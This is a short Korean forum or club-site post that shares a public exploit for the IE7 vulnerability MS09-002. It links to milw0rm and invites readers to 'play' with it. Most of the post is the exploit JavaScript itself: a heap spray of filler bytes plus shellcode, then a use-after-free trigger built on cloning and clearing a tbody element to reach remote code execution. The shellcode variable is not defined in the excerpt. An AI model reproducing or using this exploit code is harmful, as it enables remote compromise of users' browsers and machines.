동아리 홈페이지에 올라온 글 ㅋㅋ 테스트 한번 해봐야지 ㅋㅋ ㄱㄱ
MS09-002 IE7 취약점을 이용한 Exploit 코드가 milw0rm에 떴네요.
Remote code execution이 가능한 크리티컬 취약점입니다.
심심하시면 놀아보세염~
주소 : http://www.milw0rm.com/exploits/8079/
*취약점 코드*/
| var array = new Array(); //Don't need change but for execute time you can change ;) var calc = 0x100000-(shellcode.length*2+0x01020); // Spray or Not :-?? var point = unescape("%u0D0D%u0D0D"); while(point.length<calc) { point+=point;} var sec = point.substring(0,calc/2); delete point; for(i=0; i<0xD0; i++) { array[i] = sec + shellcode; } // N/A Code CollectGarbage(); var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"); var a1 = new Array(); for(var x=0;x<500;x++) a1.push(document.createElement("img")); o1=document.createElement("tbody"); o1.click; var o2 = o1.cloneNode(); o1.clearAttributes(); o1=null; CollectGarbage(); for(var x=0;x<a1.length;x++) a1[x].src=s1; o2.click; </script> # milw0rm.com [2009-02-20] |
